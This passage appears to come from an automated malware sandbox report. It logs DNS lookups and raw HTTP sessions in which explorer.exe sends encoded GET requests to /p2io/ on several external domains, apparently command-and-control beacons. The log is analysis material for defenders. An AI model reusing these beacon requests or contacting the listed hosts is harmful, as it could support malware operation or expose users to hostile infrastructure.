                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 11, 2021 16:56:12.614033937 CEST5221253192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:12.665555000 CEST53522128.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:13.545918941 CEST5430253192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:13.606432915 CEST53543028.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:13.834532022 CEST5378453192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:13.894788027 CEST53537848.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:15.408065081 CEST6530753192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:15.458506107 CEST53653078.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:16.138175964 CEST6434453192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:16.196685076 CEST53643448.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:16.223241091 CEST6206053192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:16.273665905 CEST53620608.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:16.299171925 CEST6180553192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:16.360256910 CEST53618058.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:17.177037001 CEST5479553192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:17.227389097 CEST53547958.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:18.308197021 CEST4955753192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:18.358607054 CEST53495578.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:19.277424097 CEST6173353192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:19.337816954 CEST53617338.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:20.205467939 CEST6544753192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:20.255443096 CEST53654478.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:21.369106054 CEST5244153192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:21.428035021 CEST53524418.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:22.663753033 CEST6217653192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:22.713912010 CEST53621768.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:23.748339891 CEST5959653192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:23.807461977 CEST53595968.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:24.754467964 CEST6529653192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:24.806001902 CEST53652968.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:25.654270887 CEST6318353192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:25.707287073 CEST53631838.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:26.232151031 CEST6015153192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:26.294487000 CEST53601518.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:26.576453924 CEST5696953192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:26.638016939 CEST53569698.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:41.367779970 CEST5516153192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:41.426459074 CEST53551618.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:56:57.949702978 CEST5475753192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:56:58.011586905 CEST53547578.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:57:10.520159006 CEST4999253192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:57:10.580919981 CEST53499928.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:57:45.265314102 CEST6007553192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:57:45.429331064 CEST53600758.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:57:50.851202965 CEST5501653192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:57:51.386482954 CEST53550168.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:57:54.823880911 CEST6434553192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:57:54.892786026 CEST53643458.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:01.465444088 CEST5712853192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:01.528606892 CEST53571288.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:02.030219078 CEST5479153192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:02.094945908 CEST53547918.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:07.289143085 CEST5046353192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:07.359154940 CEST53504638.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:12.461456060 CEST5039453192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:12.530822039 CEST53503948.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:15.521615028 CEST5853053192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:15.580456972 CEST53585308.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:18.138658047 CEST5381353192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:18.379194975 CEST53538138.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:23.717089891 CEST6373253192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:23.781076908 CEST53637328.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:28.787653923 CEST5734453192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:28.862853050 CEST53573448.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:29.108418941 CEST5445053192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:29.167562008 CEST53544508.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:29.773195028 CEST5926153192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:29.850440979 CEST53592618.8.8.8192.168.2.5
                                                      Jun 11, 2021 16:58:34.159264088 CEST5715153192.168.2.58.8.8.8
                                                      Jun 11, 2021 16:58:34.238081932 CEST53571518.8.8.8192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jun 11, 2021 16:56:13.834532022 CEST192.168.2.58.8.8.80x12a7Standard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:57:45.265314102 CEST192.168.2.58.8.8.80x24a3Standard query (0)www.yunlimall.comA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:57:50.851202965 CEST192.168.2.58.8.8.80xbe39Standard query (0)www.dmgt4m2g8y2uh.netA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:02.030219078 CEST192.168.2.58.8.8.80xe859Standard query (0)www.thesoulrevitalist.comA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:07.289143085 CEST192.168.2.58.8.8.80xde2aStandard query (0)www.newmopeds.comA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:12.461456060 CEST192.168.2.58.8.8.80x4005Standard query (0)www.cleanxcare.comA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:18.138658047 CEST192.168.2.58.8.8.80xc0b4Standard query (0)www.hazard-protection.comA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:23.717089891 CEST192.168.2.58.8.8.80x21b6Standard query (0)www.jonathan-mandt.comA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:28.787653923 CEST192.168.2.58.8.8.80xeeccStandard query (0)www.zgcbw.netA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:34.159264088 CEST192.168.2.58.8.8.80x668aStandard query (0)www.trendbold.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jun 11, 2021 16:56:13.894788027 CEST8.8.8.8192.168.2.50x12a7No error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
                                                      Jun 11, 2021 16:57:45.429331064 CEST8.8.8.8192.168.2.50x24a3No error (0)www.yunlimall.com142.111.47.2A (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:57:51.386482954 CEST8.8.8.8192.168.2.50xbe39No error (0)www.dmgt4m2g8y2uh.net103.120.12.113A (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:02.094945908 CEST8.8.8.8192.168.2.50xe859No error (0)www.thesoulrevitalist.comthesoulrevitalist.comCNAME (Canonical name)IN (0x0001)
                                                      Jun 11, 2021 16:58:02.094945908 CEST8.8.8.8192.168.2.50xe859No error (0)thesoulrevitalist.com34.102.136.180A (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:07.359154940 CEST8.8.8.8192.168.2.50xde2aNo error (0)www.newmopeds.com52.58.78.16A (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:12.530822039 CEST8.8.8.8192.168.2.50x4005No error (0)www.cleanxcare.comcleanxcare.comCNAME (Canonical name)IN (0x0001)
                                                      Jun 11, 2021 16:58:12.530822039 CEST8.8.8.8192.168.2.50x4005No error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:18.379194975 CEST8.8.8.8192.168.2.50xc0b4No error (0)www.hazard-protection.com148.59.128.71A (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:23.781076908 CEST8.8.8.8192.168.2.50x21b6Name error (3)www.jonathan-mandt.comnonenoneA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:28.862853050 CEST8.8.8.8192.168.2.50xeeccName error (3)www.zgcbw.netnonenoneA (IP address)IN (0x0001)
                                                      Jun 11, 2021 16:58:34.238081932 CEST8.8.8.8192.168.2.50x668aNo error (0)www.trendbold.com64.190.62.111A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.yunlimall.com
                                                      • www.dmgt4m2g8y2uh.net
                                                      • www.thesoulrevitalist.com
                                                      • www.newmopeds.com
                                                      • www.cleanxcare.com
                                                      • www.hazard-protection.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.549718142.111.47.280C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 11, 2021 16:57:45.640141010 CEST1715OUTGET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.yunlimall.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:57:45.838773012 CEST1716INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 11 Jun 2021 14:57:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 785
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e d6 ea d6 de b7 bd be c4 d0 c2 b2 c4 c1 cf d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.549719103.120.12.11380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 11, 2021 16:57:51.679858923 CEST1717OUTGET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.dmgt4m2g8y2uh.net
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:57:51.970758915 CEST1717INHTTP/1.1 403 Forbidden
                                                      Date: Fri, 11 Jun 2021 14:57:51 GMT
                                                      Server: Apache
                                                      Vary: Accept-Encoding
                                                      Content-Length: 207
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 70 32 69 6f 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /p2io/on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 11, 2021 16:58:02.140011072 CEST1786OUTGET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.thesoulrevitalist.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:58:02.278377056 CEST2232INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Fri, 11 Jun 2021 14:58:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 275
                                                      ETag: "60ba412a-113"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.54972852.58.78.1680C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 11, 2021 16:58:07.403291941 CEST6630OUTGET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.newmopeds.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:58:07.445677042 CEST6630INHTTP/1.1 410 Gone
                                                      Server: openresty
                                                      Date: Fri, 11 Jun 2021 14:56:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 65 77 6d 6f 70 65 64 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 39 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 65 77 6d 6f 70 65 64 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='5; url=http://www.newmopeds.com/' />a </head>9 <body>39 You are being redirected to http://www.newmopeds.coma </body>8</html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.54972978.31.67.9180C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 11, 2021 16:58:12.590209007 CEST6632OUTGET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.cleanxcare.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:58:13.496877909 CEST6633INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Content-Length: 707
                                                      Date: Fri, 11 Jun 2021 14:58:12 GMT
                                                      Location: https://www.cleanxcare.com/p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      5192.168.2.549731148.59.128.7180C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jun 11, 2021 16:58:18.538600922 CEST6666OUTGET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.hazard-protection.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:58:18.697585106 CEST6668INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Server: Microsoft-IIS/10.0
                                                      X-Powered-By: ASP.NET
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                                      Access-Control-Allow-Headers: Authorization
                                                      Date: Fri, 11 Jun 2021 14:58:19 GMT
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 